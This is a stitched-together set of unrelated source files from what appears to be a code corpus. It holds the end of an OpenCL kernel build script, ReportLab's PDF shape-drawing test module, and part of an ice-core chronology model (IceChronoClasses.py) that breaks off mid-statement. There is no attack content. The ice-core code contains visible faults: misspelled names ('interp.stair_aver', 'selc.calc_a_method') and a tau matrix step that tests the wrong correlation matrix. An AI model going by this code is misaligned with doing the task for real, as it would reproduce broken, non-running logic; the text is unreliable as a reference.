struct MyStruct {
    int myint;
};

struct S2 {
    constant struct MyStruct *s;
};

struct S3 {
    struct MyStruct *s;
};

struct S4 {
    global struct MyStruct *s;
};

constant struct MyStruct foo = { 345 };
constant struct S2 bar = { &foo };
constant struct S3 bar2 = { 0 };

kernel void mykernel(global float *float_data, global struct S3 *s3,
                     global struct S4 *s4, global struct MyStruct *astruct) {
    constant struct MyStruct *f = &foo;
    constant struct MyStruct **g = &f;
    constant struct MyStruct *h = bar.s;
    struct MyStruct *i = bar2.s;
    struct MyStruct *j = s3->s;
    global struct S3 *k = s3;
    global struct S3 **l = &k;
    struct MyStruct **m = &j;
    s4->s = astruct;
}
"""
# Echo the kernel with line numbers so OpenCL build errors are easy to map.
for i, line in enumerate(source.split('\n')):
    print(i + 1, line)

prg = cl.Program(ctx, source).build()
apache-2.0
TaskEvolution/Task-Coach-Evolution
taskcoach/taskcoachlib/thirdparty/src/reportlab/graphics/testshapes.py
3
17121
#!/bin/env python #Copyright ReportLab Europe Ltd. 2000-2012 #see license.txt for license details #history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/graphics/testshapes.py # testshapes.py - draws shapes onto a PDF canvas. __version__ = ''' $Id $ ''' __doc__='''Execute this script to see some test drawings. This contains a number of routines to generate test drawings for reportlab/graphics. For now many of them are contrived, but we will expand them to try and trip up any parser. Feel free to add more. ''' import os, sys from reportlab.lib import colors from reportlab.lib.units import cm from reportlab.pdfgen.canvas import Canvas from reportlab.pdfbase.pdfmetrics import stringWidth from reportlab.platypus import Flowable from reportlab.graphics.shapes import * from reportlab.graphics.renderPDF import _PDFRenderer import unittest _FONTS = ['Times-Roman','Vera','Times-BoldItalic',] def _setup(): from reportlab.pdfbase import pdfmetrics, ttfonts pdfmetrics.registerFont(ttfonts.TTFont("Vera", "Vera.ttf")) pdfmetrics.registerFont(ttfonts.TTFont("VeraBd", "VeraBd.ttf")) pdfmetrics.registerFont(ttfonts.TTFont("VeraIt", "VeraIt.ttf")) pdfmetrics.registerFont(ttfonts.TTFont("VeraBI", "VeraBI.ttf")) F = ['Times-Roman','Courier','Helvetica','Vera', 'VeraBd', 'VeraIt', 'VeraBI'] if sys.platform=='win32': for name, ttf in [ ('Adventurer Light SF','Advlit.ttf'),('ArialMS','ARIAL.TTF'), ('Arial Unicode MS', 'ARIALUNI.TTF'), ('Book Antiqua','BKANT.TTF'), ('Century Gothic','GOTHIC.TTF'), ('Comic Sans MS', 'COMIC.TTF'), ('Elementary Heavy SF Bold','Vwagh.ttf'), ('Firenze SF','flot.ttf'), ('Garamond','GARA.TTF'), ('Jagger','Rols.ttf'), ('Monotype Corsiva','MTCORSVA.TTF'), ('Seabird SF','seag.ttf'), ('Tahoma','TAHOMA.TTF'), ('VerdanaMS','VERDANA.TTF'), ]: for D in ('c:\WINNT','c:\Windows'): fn = os.path.join(D,'Fonts',ttf) if os.path.isfile(fn): try: f = ttfonts.TTFont(name, fn) pdfmetrics.registerFont(f) F.append(name) except: pass return F def 
resetFonts(): for f in _setup(): if f not in _FONTS: _FONTS.append(f) from reportlab.rl_config import register_reset register_reset(resetFonts) resetFonts() ######################################################### # # Collections of shape drawings. # ######################################################### def getFailedDrawing(funcName): """Generate a drawing in case something goes really wrong. This will create a drawing to be displayed whenever some other drawing could not be executed, because the generating function does something terribly wrong! The box contains an attention triangle, plus some error message. """ D = Drawing(400, 200) points = [200,170, 140,80, 260,80] D.add(Polygon(points, strokeWidth=0.5*cm, strokeColor=colors.red, fillColor=colors.yellow)) s = String(200, 40, "Error in generating function '%s'!" % funcName, textAnchor='middle') D.add(s) return D # These are the real drawings to be eye-balled. def getDrawing01(): """Hello World, on a rectangular background. The rectangle's fillColor is yellow. The string's fillColor is red. """ D = Drawing(400, 200) D.add(Rect(50, 50, 300, 100, fillColor=colors.yellow)) D.add(String(180,100, 'Hello World', fillColor=colors.red)) D.add(String(180,86, 'Special characters \xc2\xa2\xc2\xa9\xc2\xae\xc2\xa3\xce\xb1\xce\xb2', fillColor=colors.red)) return D def getDrawing02(): """Various Line shapes. The lines are blue and their strokeWidth is 5 mm. One line has a strokeDashArray set to [5, 10, 15]. """ D = Drawing(400, 200) D.add(Line(50,50, 300,100, strokeColor=colors.blue, strokeWidth=0.5*cm, )) D.add(Line(50,100, 300,50, strokeColor=colors.blue, strokeWidth=0.5*cm, strokeDashArray=[5, 10, 15], )) #x = 1/0 # Comment this to see the actual drawing! return D def getDrawing03(): """Text strings in various sizes and different fonts. Font size increases from 12 to 36 and from bottom left to upper right corner. The first ones should be in Times-Roman. Finally, a solitary Courier string at the top right corner. 
""" D = Drawing(400, 200) for size in range(12, 36, 4): D.add(String(10+size*2, 10+size*2, 'Hello World', fontName=_FONTS[0], fontSize=size)) D.add(String(150, 150, 'Hello World', fontName=_FONTS[1], fontSize=36)) return D def getDrawing04(): """Text strings in various colours. Colours are blue, yellow and red from bottom left to upper right. """ D = Drawing(400, 200) i = 0 for color in (colors.blue, colors.yellow, colors.red): D.add(String(50+i*30, 50+i*30, 'Hello World', fillColor=color)) i = i + 1 return D def getDrawing05(): """Text strings with various anchors (alignments). Text alignment conforms to the anchors in the left column. """ D = Drawing(400, 200) lineX = 250 D.add(Line(lineX,10, lineX,190, strokeColor=colors.gray)) y = 130 for anchor in ('start', 'middle', 'end'): D.add(String(lineX, y, 'Hello World', textAnchor=anchor)) D.add(String(50, y, anchor + ':')) y = y - 30 return D def getDrawing06(): """This demonstrates all the basic shapes at once. There are no groups or references. Each solid shape should have a green fill. """ green = colors.green D = Drawing(400, 200) #, fillColor=green) D.add(Line(10,10, 390,190)) D.add(Circle(100,100,20, fillColor=green)) D.add(Circle(200,100,40, fillColor=green)) D.add(Circle(300,100,30, fillColor=green)) D.add(Wedge(330,100,40, -10,40, fillColor=green)) D.add(PolyLine([120,10, 130,20, 140,10, 150,20, 160,10, 170,20, 180,10, 190,20, 200,10], fillColor=green)) D.add(Polygon([300,20, 350,20, 390,80, 300,75, 330,40], fillColor=green)) D.add(Ellipse(50,150, 40, 20, fillColor=green)) D.add(Rect(120,150, 60,30, strokeWidth=10, strokeColor=colors.yellow, fillColor=green)) #square corners D.add(Rect(220, 150, 60, 30, 10, 10, fillColor=green)) #round corners D.add(String(10,50, 'Basic Shapes', fillColor=colors.black, fontName='Helvetica')) return D def getDrawing07(): """This tests the ability to translate and rotate groups. The first set of axes should be near the bottom left of the drawing. 
The second should be rotated counterclockwise by 15 degrees. The third should be rotated by 30 degrees.""" D = Drawing(400, 200) Axis = Group( Line(0,0,100,0), #x axis Line(0,0,0,50), # y axis Line(0,10,10,10), #ticks on y axis Line(0,20,10,20), Line(0,30,10,30), Line(0,40,10,40), Line(10,0,10,10), #ticks on x axis Line(20,0,20,10), Line(30,0,30,10), Line(40,0,40,10), Line(50,0,50,10), Line(60,0,60,10), Line(70,0,70,10), Line(80,0,80,10), Line(90,0,90,10), String(20, 35, 'Axes', fill=colors.black) ) firstAxisGroup = Group(Axis) firstAxisGroup.translate(10,10) D.add(firstAxisGroup) secondAxisGroup = Group(Axis) secondAxisGroup.translate(150,10) secondAxisGroup.rotate(15) D.add(secondAxisGroup) thirdAxisGroup = Group(Axis, transform=mmult(translate(300,10), rotate(30))) D.add(thirdAxisGroup) return D def getDrawing08(): """This tests the ability to scale coordinates. The bottom left set of axes should be near the bottom left of the drawing. The bottom right should be stretched vertically by a factor of 2. The top left one should be stretched horizontally by a factor of 2. 
The top right should have the vertical axiss leaning over to the right by 30 degrees.""" D = Drawing(400, 200) Axis = Group( Line(0,0,100,0), #x axis Line(0,0,0,50), # y axis Line(0,10,10,10), #ticks on y axis Line(0,20,10,20), Line(0,30,10,30), Line(0,40,10,40), Line(10,0,10,10), #ticks on x axis Line(20,0,20,10), Line(30,0,30,10), Line(40,0,40,10), Line(50,0,50,10), Line(60,0,60,10), Line(70,0,70,10), Line(80,0,80,10), Line(90,0,90,10), String(20, 35, 'Axes', fill=colors.black) ) firstAxisGroup = Group(Axis) firstAxisGroup.translate(10,10) D.add(firstAxisGroup) secondAxisGroup = Group(Axis) secondAxisGroup.translate(150,10) secondAxisGroup.scale(1,2) D.add(secondAxisGroup) thirdAxisGroup = Group(Axis) thirdAxisGroup.translate(10,125) thirdAxisGroup.scale(2,1) D.add(thirdAxisGroup) fourthAxisGroup = Group(Axis) fourthAxisGroup.translate(250,125) fourthAxisGroup.skew(30,0) D.add(fourthAxisGroup) return D def getDrawing09(): """This tests rotated strings Some renderers will have a separate mechanism for font drawing. This test just makes sure strings get transformed the same way as regular graphics.""" D = Drawing(400, 200) fontName = _FONTS[0] fontSize = 12 text = "I should be totally horizontal and enclosed in a box" textWidth = stringWidth(text, fontName, fontSize) g1 = Group( String(20, 20, text, fontName=fontName, fontSize = fontSize), Rect(18, 18, textWidth + 4, fontSize + 4, fillColor=None) ) D.add(g1) text = "I should slope up by 15 degrees, so my right end is higher than my left" textWidth = stringWidth(text, fontName, fontSize) g2 = Group( String(20, 20, text, fontName=fontName, fontSize = fontSize), Rect(18, 18, textWidth + 4, fontSize + 4, fillColor=None) ) g2.translate(0, 50) g2.rotate(15) D.add(g2) return D def getDrawing10(): """This tests nested groups with multiple levels of coordinate transformation. 
Each box should be staggered up and to the right, moving by 25 points each time.""" D = Drawing(400, 200) fontName = _FONTS[0] fontSize = 12 g1 = Group( Rect(0, 0, 100, 20, fillColor=colors.yellow), String(5, 5, 'Text in the box', fontName=fontName, fontSize = fontSize) ) D.add(g1) g2 = Group(g1, transform = translate(25,25)) D.add(g2) g3 = Group(g2, transform = translate(25,25)) D.add(g3) g4 = Group(g3, transform = translate(25,25)) D.add(g4) return D from widgets.signsandsymbols import SmileyFace def getDrawing11(): '''test of anchoring''' def makeSmiley(x, y, size, color): "Make a smiley data item representation." d = size s = SmileyFace() s.fillColor = color s.x = x-d s.y = y-d s.size = d*2 return s D = Drawing(400, 200) #, fillColor=colors.purple) g = Group(transform=(1,0,0,1,0,0)) g.add(makeSmiley(100,100,10,colors.red)) g.add(Line(90,100,110,100,strokeColor=colors.green)) g.add(Line(100,90,100,110,strokeColor=colors.green)) D.add(g) g = Group(transform=(2,0,0,2,100,-100)) g.add(makeSmiley(100,100,10,colors.blue)) g.add(Line(90,100,110,100,strokeColor=colors.green)) g.add(Line(100,90,100,110,strokeColor=colors.green)) D.add(g) g = Group(transform=(2,0,0,2,0,0)) return D def getDrawing12(): """Text strings in a non-standard font. All that is required is to place the .afm and .pfb files on the font patch given in rl_config.py, for example in reportlab/lib/fonts/. 
""" faceName = "DarkGardenMK" D = Drawing(400, 200) for size in range(12, 36, 4): D.add(String(10+size*2, 10+size*2, 'Hello World', fontName=faceName, fontSize=size)) return D def getDrawing13(): 'Test Various TTF Fonts' def drawit(F,w=400,h=200,fontSize=12,slack=2,gap=5): D = Drawing(w,h) th = 2*gap + fontSize*1.2 gh = gap + .2*fontSize y = h maxx = 0 for fontName in F: y -= th text = fontName+": I should be totally horizontal and enclosed in a box and end in alphabetagamma \xc2\xa2\xc2\xa9\xc2\xae\xc2\xa3\xca\xa5\xd0\x96\xd6\x83\xd7\x90\xd9\x82\xe0\xa6\x95\xce\xb1\xce\xb2\xce\xb3" textWidth = stringWidth(text, fontName, fontSize) maxx = max(maxx,textWidth+20) D.add( Group(Rect(8, y-gh, textWidth + 4, th, strokeColor=colors.red, strokeWidth=.5, fillColor=colors.lightgrey), String(10, y, text, fontName=fontName, fontSize = fontSize))) y -= 5 return maxx, h-y+gap, D maxx, maxy, D = drawit(_FONTS) if maxx>400 or maxy>200: _,_,D = drawit(_FONTS,maxx,maxy) return D ##def getDrawing14(): ## """This tests inherited properties. Each font should be as it says.""" ## D = Drawing(400, 200) ## ## fontSize = 12 ## D.fontName = 'Courier' ## ## g1 = Group( ## Rect(0, 0, 150, 20, fillColor=colors.yellow), ## String(5, 5, 'Inherited Courier', fontName=inherit, fontSize = fontSize) ## ) ## D.add(g1) ## ## g2 = Group(g1, transform = translate(25,25)) ## D.add(g2) ## ## g3 = Group(g2, transform = translate(25,25)) ## D.add(g3) ## ## g4 = Group(g3, transform = translate(25,25)) ## D.add(g4) ## ## ## return D def getAllFunctionDrawingNames(doTTF=1): "Get a list of drawing function names from somewhere." funcNames = [] # Here we get the names from the global name space. 
symbols = globals().keys() symbols.sort() for funcName in symbols: if funcName[0:10] == 'getDrawing': if doTTF or funcName!='getDrawing13': funcNames.append(funcName) return funcNames def _evalFuncDrawing(name, D, l=None, g=None): try: d = eval(name + '()', g or globals(), l or locals()) except: d = getFailedDrawing(name) D.append((d, eval(name + '.__doc__'), name[3:])) def getAllTestDrawings(doTTF=1): D = [] for f in getAllFunctionDrawingNames(doTTF=doTTF): _evalFuncDrawing(f,D) return D def writePDF(drawings): "Create and save a PDF file containing some drawings." pdfPath = os.path.splitext(sys.argv[0])[0] + '.pdf' c = Canvas(pdfPath) c.setFont(_FONTS[0], 32) c.drawString(80, 750, 'ReportLab Graphics-Shapes Test') # Print drawings in a loop, with their doc strings. c.setFont(_FONTS[0], 12) y = 740 i = 1 for (drawing, docstring, funcname) in drawings: if y < 300: # Allows 5-6 lines of text. c.showPage() y = 740 # Draw a title. y = y - 30 c.setFont(_FONTS[2],12) c.drawString(80, y, '%s (#%d)' % (funcname, i)) c.setFont(_FONTS[0],12) y = y - 14 textObj = c.beginText(80, y) textObj.textLines(docstring) c.drawText(textObj) y = textObj.getY() y = y - drawing.height drawing.drawOn(c, 80, y) i = i + 1 c.save() print 'wrote %s ' % pdfPath class ShapesTestCase(unittest.TestCase): "Test generating all kinds of shapes." def setUp(self): "Prepare some things before the tests start." self.funcNames = getAllFunctionDrawingNames() self.drawings = [] def tearDown(self): "Do what has to be done after the tests are over." writePDF(self.drawings) # This should always succeed. If each drawing would be # wrapped in a dedicated test method like this one, it # would be possible to have a count for wrong tests # as well... Something like this is left for later... def testAllDrawings(self): "Make a list of drawings." for f in self.funcNames: if f[0:10] == 'getDrawing': # Make an instance and get its doc string. # If that fails, use a default error drawing. 
_evalFuncDrawing(f,self.drawings) def makeSuite(): "Make a test suite for unit testing." suite = unittest.TestSuite() suite.addTest(ShapesTestCase('testAllDrawings')) return suite if __name__ == "__main__": unittest.TextTestRunner().run(makeSuite())
gpl-3.0
parrenin/IceChrono
IceChronoClasses.py
1
53921
#TODO: extend the chronology down to the bedrock by extrapolating the accumulation
#TODO: optionally use a restart file to have a bootstrap method
#TODO: is there an elegant way to unpack the variables vector in the model function?
#TODO: allow saving the correction vector to be able to restart while changing the resolution
#TODO: include some checks for when dDdepth/dz>1
#TODO: should Delta-depth observations be lognormal?
#TODO: we should superpose two charts for ice and air ages, one for the age and one for the uncertainty, since the min age is not always near 0.
#TODO: also compute the prior uncertainties and show them in the figures.
#TODO: the reading of observations does not work if there is only one observation (since the matrix that was read is 1D in this case).
#TODO: is there really a computation gain with the change of variable for the correction functions? Avoiding this change of variables would make the code easier to understand. I think there is no gain, since solving A^-1 b when we have the LU factorisation of A does not cost more than computing A^-1 * b when we have computed A^-1.
def interp_lin_aver(xp, x, y): yp=np.nan*np.zeros(np.size(xp)-1) if xp[0]<min(x): xmod=np.concatenate((np.array([xp[0]]),x)) ymod=np.concatenate((np.array([y[0]]),y)) else: xmod=x+0 ymod=y+0 if xp[-1]>max(x): xmod=np.concatenate((xmod,np.array([xp[-1]]))) ymod=np.concatenate((ymod,np.array([y[-1]]))) for i in range(np.size(xp)-1): xx=xmod[np.where(np.logical_and(xmod>xp[i],xmod<xp[i+1]))] xx=np.concatenate((np.array([xp[i]]),xx,np.array([xp[i+1]]))) yy=np.interp(xx, xmod, ymod) yp[i]=np.sum((yy[1:]+yy[:-1])/2*(xx[1:]-xx[:-1]))/(xp[i+1]-xp[i]) return yp def interp_stair_aver(xp, x, y): xmod=x+0 ymod=y+0 if xp[0]<x[0]: xmod=np.concatenate((np.array([xp[0]]),xmod)) ymod=np.concatenate((np.array([y[0]]),ymod)) if xp[-1]>x[-1]: xmod=np.concatenate((xmod,np.array([xp[-1]]))) ymod=np.concatenate((ymod,np.array([y[-1]]))) yint=np.cumsum(np.concatenate((np.array([0]),ymod[:-1]*(xmod[1:]-xmod[:-1])))) yp=(np.interp(xp[1:], xmod, yint)-np.interp(xp[:-1], xmod, yint))/(xp[1:]-xp[:-1]) #Maybe this is suboptimal since we compute twice g(xp[i]) return yp def gaussian(x): return np.exp(-x**2/2) class Drilling: def __init__(self, dlabel): self.label=dlabel def init(self): # print 'Initialization of drilling '+self.label self.accu_prior_rep='staircase' execfile(datadir+'/parameters-AllDrillings.py') execfile(datadir+self.label+'/parameters.py') self.depth_mid=(self.depth[1:]+self.depth[:-1])/2 self.depth_inter=(self.depth[1:]-self.depth[:-1]) ## We set up the raw model if self.calc_a: readarray=np.loadtxt(datadir+self.label+'/isotopes.txt') if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.iso_depth=readarray[:,0] if self.calc_a_method=='fullcorr': self.iso_d18Oice=readarray[:,1] self.d18Oice=interp.stair_aver(self.depth, self.iso_depth, self.iso_d18Oice) self.iso_deutice=readarray[:,2] self.deutice=interp_stair_aver(self.depth, self.iso_depth, self.iso_deutice) self.iso_d18Osw=readarray[:,3] self.d18Osw=interp.stair_aver(self.depth, 
self.iso_depth, self.iso_d18Osw) self.excess=self.deutice-8*self.d18Oice # dans Uemura : d=excess self.a=np.empty_like(self.deutice) self.d18Oice_corr=self.d18Oice-self.d18Osw*(1+self.d18Oice/1000)/(1+self.d18Osw/1000) #Uemura (1) self.deutice_corr=self.deutice-8*self.d18Osw*(1+self.deutice/1000)/(1+8*self.d18Osw/1000) #Uemura et al. (CP, 2012) (2) self.excess_corr=self.deutice_corr-8*self.d18Oice_corr self.deutice_fullcorr=self.deutice_corr+self.gamma_source/self.beta_source*self.excess_corr elif self.calc_a_method=='deut': self.iso_deutice=readarray[:,1] self.deutice_fullcorr=interp_stair_aver(self.depth, self.iso_depth, self.iso_deutice) elif selc.calc_a_method=='d18O': self.d18Oice=readarray[:,1] self.deutice_fullcorr=8*interp_stair_aver(self.depth, self.iso_depth, self.iso_d18Oice) else: print 'Accumulation method not recognized' quit() else: readarray=np.loadtxt(datadir+self.label+'/accu-prior.txt') if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.a_depth=readarray[:,0] self.a_a=readarray[:,1] if readarray.shape[1]>=3: self.a_sigma=readarray[:,2] if self.accu_prior_rep=='staircase': self.a_model=interp_stair_aver(self.depth, self.a_depth, self.a_a) elif self.accu_prior_rep=='linear': self.a_model=interp_lin_aver(self.depth, self.a_depth, self.a_a) else: print 'Representation of prior accu scenario not recognized' self.a=self.a_model self.age=np.empty_like(self.depth) self.airage=np.empty_like(self.depth) readarray=np.loadtxt(datadir+self.label+'/density-prior.txt') # self.density_depth=readarray[:,0] if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.D_depth=readarray[:,0] self.D_D=readarray[:,1] self.D=np.interp(self.depth_mid, self.D_depth, self.D_D) self.iedepth=np.cumsum(np.concatenate((np.array([0]), self.D*self.depth_inter))) self.iedepth_mid=(self.iedepth[1:]+self.iedepth[:-1])/2 if self.calc_tau: self.thickness_ie=self.thickness-self.depth[-1]+self.iedepth[-1] if 
self.calc_LID: if self.depth[0]<self.LID_value: self.LID_depth=np.array([self.depth[0], self.LID_value, self.depth[-1]]) self.LID_LID=np.array([self.depth[0], self.LID_value, self.LID_value]) else: self.LID_depth=np.array([self.depth[0], self.depth[-1]]) self.LID_LID=np.array([self.LID_value, self.LID_value]) else: # self.LID_model=np.loadtxt(datadir+self.label+'/LID-prior.txt') readarray=np.loadtxt(datadir+self.label+'/LID-prior.txt') if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.LID_depth=readarray[:,0] self.LID_LID=readarray[:,1] if readarray.shape[1]>=3: self.LID_sigma=readarray[:,2] self.LID_model=np.interp(self.depth, self.LID_depth, self.LID_LID) self.Ddepth=np.empty_like(self.depth) self.udepth=np.empty_like(self.depth) # print 'depth_mid ', np.size(self.depth_mid) # print 'zeta ', np.size(self.zeta) if self.calc_tau: self.thicknessie=self.thickness-self.depth[-1]+self.iedepth[-1] self.zeta=(self.thicknessie-self.iedepth_mid)/self.thicknessie #FIXME: maybe we should use iedepth and thickness_ie here? 
self.tau=np.empty_like(self.depth_mid) else: readarray=np.loadtxt(datadir+self.label+'/thinning-prior.txt') if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.tau_depth=readarray[:,0] self.tau_tau=readarray[:,1] if readarray.shape[1]>=3: self.tau_sigma=readarray[:,2] self.tau_model=np.interp(self.depth_mid, self.tau_depth, self.tau_tau) self.tau=self.tau_model self.raw_model() ## Now we set up the correction functions if self.start=='restart': self.variables=np.loadtxt(datadir+self.label+'/restart.txt') elif self.start=='default': self.corr_a=np.zeros(np.size(self.corr_a_age)) self.corr_LID=np.zeros(np.size(self.corr_LID_age)) self.corr_tau=np.zeros(np.size(self.corr_tau_depth)) elif self.start=='random': self.corr_a=np.random.normal(loc=0., scale=1., size=np.size(self.corr_a_age)) self.corr_LID=np.random.normal(loc=0., scale=1., size=np.size(self.corr_LID_age)) self.corr_tau=np.random.normal(loc=0., scale=1., size=np.size(self.corr_tau_depth)) else: print 'Start option not recognized.' 
## Now we set up the correlation matrices self.correlation_corr_a=np.diag(np.ones(np.size(self.corr_a))) self.correlation_corr_LID=np.diag(np.ones(np.size(self.corr_LID))) self.correlation_corr_tau=np.diag(np.ones(np.size(self.corr_tau))) self.chol_a=np.diag(np.ones(np.size(self.corr_a))) self.chol_LID=np.diag(np.ones(np.size(self.corr_LID))) self.chol_tau=np.diag(np.ones(np.size(self.corr_tau))) ## Definition of the covariance matrix of the background try: self.sigmap_corr_a=np.interp(self.corr_a_age, self.fct_age_model(self.a_depth), self.a_sigma) #FIXME: we should average here since it would be more representative except AttributeError: print 'Sigma on prior accu scenario not defined in the accu-prior.txt file' try: self.sigmap_corr_LID=np.interp(self.corr_LID_age, self.fct_airage_model(self.LID_depth) , self.LID_sigma) #FIXME: we should average here since it would be more representative except AttributeError: print 'Sigma on prior LID scenario not defined in the LID-prior.txt file' try: self.sigmap_corr_tau=np.interp(self.corr_tau_depth, self.tau_depth, self.tau_sigma) #FIXME: we should average here since it would be more representative except AttributeError: print 'Sigma on prior thinning scenario not defined in the thinning-prior.txt file' self.correlation_corr_a_before=self.correlation_corr_a+0 self.correlation_corr_LID_before=self.correlation_corr_LID+0 self.correlation_corr_tau_before=self.correlation_corr_tau+0 filename=datadir+self.label+'/parameters-CovariancePrior-init.py' if os.path.isfile(filename): execfile(filename) else: filename=datadir+'/parameters-CovariancePrior-AllDrillings-init.py' if os.path.isfile(filename): execfile(filename) if (self.correlation_corr_a_before!=self.correlation_corr_a).any(): self.chol_a=cholesky(self.correlation_corr_a) if (self.correlation_corr_LID_before!=self.correlation_corr_LID).any(): self.chol_LID=cholesky(self.correlation_corr_LID) if (self.correlation_corr_a_before!=self.correlation_corr_a).any(): 
self.chol_tau=cholesky(self.correlation_corr_tau) self.variables=np.array([]) # if self.calc_a==True: # self.variables=np.concatenate((self.variables, np.array([self.A0]), np.array([self.beta]))) # if self.calc_tau==True: # self.variables=np.concatenate((self.variables, np.array([self.pprime]), np.array([self.muprime]))) self.variables=np.concatenate((self.variables, self.corr_tau, self.corr_a, self.corr_LID)) #Reading of observations filename=datadir+self.label+'/ice_age.txt' with warnings.catch_warnings(): warnings.simplefilter("ignore") if os.path.isfile(filename) and open(filename).read() and np.size(np.loadtxt(filename))>0: readarray=np.loadtxt(filename) if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.icemarkers_depth=readarray[:,0] self.icemarkers_age=readarray[:,1] self.icemarkers_sigma=readarray[:,2] else: self.icemarkers_depth=np.array([]) self.icemarkers_age=np.array([]) self.icemarkers_sigma=np.array([]) filename=datadir+self.label+'/air_age.txt' with warnings.catch_warnings(): warnings.simplefilter("ignore") if os.path.isfile(filename) and open(filename).read() and np.size(np.loadtxt(filename))>0: readarray=np.loadtxt(filename) if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.airmarkers_depth=readarray[:,0] self.airmarkers_age=readarray[:,1] self.airmarkers_sigma=readarray[:,2] else: self.airmarkers_depth=np.array([]) self.airmarkers_age=np.array([]) self.airmarkers_sigma=np.array([]) filename=datadir+self.label+'/ice_age_intervals.txt' with warnings.catch_warnings(): warnings.simplefilter("ignore") if os.path.isfile(filename) and open(filename).read() and np.size(np.loadtxt(filename))>0: readarray=np.loadtxt(filename) if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.iceintervals_depthtop=readarray[:,0] self.iceintervals_depthbot=readarray[:,1] self.iceintervals_duration=readarray[:,2] 
self.iceintervals_sigma=readarray[:,3] else: self.iceintervals_depthtop=np.array([]) self.iceintervals_depthbot=np.array([]) self.iceintervals_duration=np.array([]) self.iceintervals_sigma=np.array([]) filename=datadir+self.label+'/air_age_intervals.txt' with warnings.catch_warnings(): warnings.simplefilter("ignore") if os.path.isfile(filename) and open(filename).read() and np.size(np.loadtxt(filename))>0: readarray=np.loadtxt(filename) if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.airintervals_depthtop=readarray[:,0] self.airintervals_depthbot=readarray[:,1] self.airintervals_duration=readarray[:,2] self.airintervals_sigma=readarray[:,3] else: self.airintervals_depthtop=np.array([]) self.airintervals_depthbot=np.array([]) self.airintervals_duration=np.array([]) self.airintervals_sigma=np.array([]) filename=datadir+self.label+'/Ddepth.txt' with warnings.catch_warnings(): warnings.simplefilter("ignore") if os.path.isfile(filename) and open(filename).read() and np.size(np.loadtxt(filename))>0: readarray=np.loadtxt(filename) if (np.size(readarray)==np.shape(readarray)[0]): readarray.resize(1, np.size(readarray)) self.Ddepth_depth=readarray[:,0] self.Ddepth_Ddepth=readarray[:,1] self.Ddepth_sigma=readarray[:,2] else: self.Ddepth_depth=np.array([]) self.Ddepth_Ddepth=np.array([]) self.Ddepth_sigma=np.array([]) self.icemarkers_correlation=np.diag(np.ones(np.size(self.icemarkers_depth))) self.airmarkers_correlation=np.diag(np.ones(np.size(self.airmarkers_depth))) self.iceintervals_correlation=np.diag(np.ones(np.size(self.iceintervals_depthtop))) self.airintervals_correlation=np.diag(np.ones(np.size(self.airintervals_depthtop))) self.Ddepth_correlation=np.diag(np.ones(np.size(self.Ddepth_depth))) # print self.icemarkers_correlation filename=datadir+'/parameters-CovarianceObservations-AllDrillings.py' if os.path.isfile(filename): execfile(filename) filename=datadir+self.label+'/parameters-CovarianceObservations.py' if 
os.path.isfile(filename): execfile(filename) if np.size(self.icemarkers_depth)>0: self.icemarkers_chol=cholesky(self.icemarkers_correlation) self.icemarkers_lu_piv=scipy.linalg.lu_factor(np.transpose(self.icemarkers_chol)) #FIXME: we LU factor a triangular matrix. This is suboptimal. We should set lu_piv directly instead. if np.size(self.airmarkers_depth)>0: self.airmarkers_chol=cholesky(self.airmarkers_correlation) self.airmarkers_lu_piv=scipy.linalg.lu_factor(np.transpose(self.airmarkers_chol)) if np.size(self.iceintervals_depthtop)>0: self.iceintervals_chol=cholesky(self.iceintervals_correlation) self.iceintervals_lu_piv=scipy.linalg.lu_factor(np.transpose(self.iceintervals_chol)) if np.size(self.airintervals_depthtop)>0: self.airintervals_chol=cholesky(self.airintervals_correlation) self.airintervals_lu_piv=scipy.linalg.lu_factor(np.transpose(self.airintervals_chol)) if np.size(self.Ddepth_depth)>0: self.Ddepth_chol=cholesky(self.Ddepth_correlation) self.Ddepth_lu_piv=scipy.linalg.lu_factor(np.transpose(self.Ddepth_chol)) def raw_model(self): #Accumulation if self.calc_a: self.a_model=self.A0*np.exp(self.beta*(self.deutice_fullcorr-self.deutice_fullcorr[0])) #Parrenin et al. (CP, 2007a) 2.3 (6) #Thinning if self.calc_tau: self.p=-1+m.exp(self.pprime) self.mu=m.exp(self.muprime) # self.s=m.tanh(self.sprime) omega_D=1-(self.p+2)/(self.p+1)*(1-self.zeta)+1/(self.p+1)*(1-self.zeta)**(self.p+2) #Parrenin et al. (CP, 2007a) 2.2 (3) omega=self.s*self.zeta+(1-self.s)*omega_D #Parrenin et al. 
(CP, 2007a) 2.2 (2) self.tau_model=(1-self.mu)*omega+self.mu #udepth self.udepth_model=self.udepth_top+np.cumsum(np.concatenate((np.array([0]), self.D/self.tau_model*self.depth_inter))) self.LIDIE_model=self.LID_model*self.Dfirn self.ULIDIE_model=np.interp(self.LIDIE_model, self.iedepth, self.udepth_model) #Ice age self.icelayerthick_model=self.tau_model*self.a_model/self.D self.age_model=self.age_top+np.cumsum(np.concatenate((np.array([0]), self.D/self.tau_model/self.a_model*self.depth_inter))) #air age # self.ice_equiv_depth_model=i_model(np.where(self.udepth_model-self.ULIDIE_model>self.udepth_top, self.udepth_model-self.ULIDIE_model, np.nan)) self.ice_equiv_depth_model=np.interp(self.udepth_model-self.ULIDIE_model, self.udepth_model, self.depth) self.Ddepth_model=self.depth-self.ice_equiv_depth_model self.airage_model=np.interp(self.ice_equiv_depth_model, self.depth, self.age_model, left=np.nan, right=np.nan) self.airlayerthick_model=1/np.diff(self.airage_model) def corrected_model(self): self.correlation_corr_a_before=self.correlation_corr_a+0 self.correlation_corr_LID_before=self.correlation_corr_LID+0 self.correlation_corr_tau_before=self.correlation_corr_tau+0 filename=datadir+'/parameters-CovariancePrior-AllDrillings.py' if os.path.isfile(filename): execfile(filename) filename=datadir+self.label+'/parameters-CovariancePrior.py' if os.path.isfile(filename): execfile(filename) if 